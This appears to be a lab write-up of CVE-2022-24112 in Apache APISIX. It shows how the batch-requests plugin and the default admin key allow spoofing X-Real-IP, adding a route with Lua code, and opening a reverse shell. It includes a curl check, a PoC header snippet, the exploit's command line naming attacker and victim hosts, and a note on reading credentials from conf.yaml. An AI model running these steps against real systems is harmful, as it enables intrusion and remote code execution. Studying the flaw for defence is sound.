CVE-2022-24112 Apache APISIX Command Execution Vulnerability
Apache APISIX is a cloud-native API gateway under the Apache Software Foundation. It is dynamic, real-time, and high-performance. It provides load balancing, dynamic upstream, gray release (canary release), service fuse, identity authentication, Abundant traffic management functions such as observability
After enabling the Apache APISIX batch-requests plug-in, the attacker bypasses the IP restrictions of the Apache APISIX data panel through the batch-requests plug-in (such as bypassing the IP black and white list restrictions). If the user uses the default configuration of Apache APISIX (enable Admin API, use the default Admin Key and no additional management port is allocated), the attacker can call the Admin API through the batch-requests plug-in, resulting in remote code execution
Vulnerability context: CVE-2022-24112: Apache APISIX Command Execution Vulnerability
After the environment is started, access port 9000, and you can use the curl command to confirm the existence of the vulnerability
ocean@OceandeMBP ~ % curl 'http://192.168.186.148:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Fri, 24 Mar 2023 03:27:45 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{
"action":"get","count":0,"node":{
"dir":true,"key":"\/apisix\/routes","nodes":{
}}}
poc:https://github.com/twseptian/cve-2022-24112
The main idea of poc is to bypass IP verification by passing parameters + use the default API KEY value to call the Admin API
json_data = {
'headers': {
'X-Real-IP': '{}:8080'.format(target_ip),
'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
'Content-Type': 'application/json',
}
Then use the PUT request to add a route, trigger filter_func()the execution of the lua code, and use the above EXP to attack. The command format is as follows:
python3 exp.py -t 受害者主机 -p 服务运行的端口 -L 攻击者主机 -P 接受反弹Shell的端口
The Apisix background password is stored in the api/conf/conf.yaml file, which can be obtained by reading the file through command execution
Log in to the background and you can see a route list added by it. In filter_func()the function, the lua system directory execution statement is called os.execute()to rebound the shell
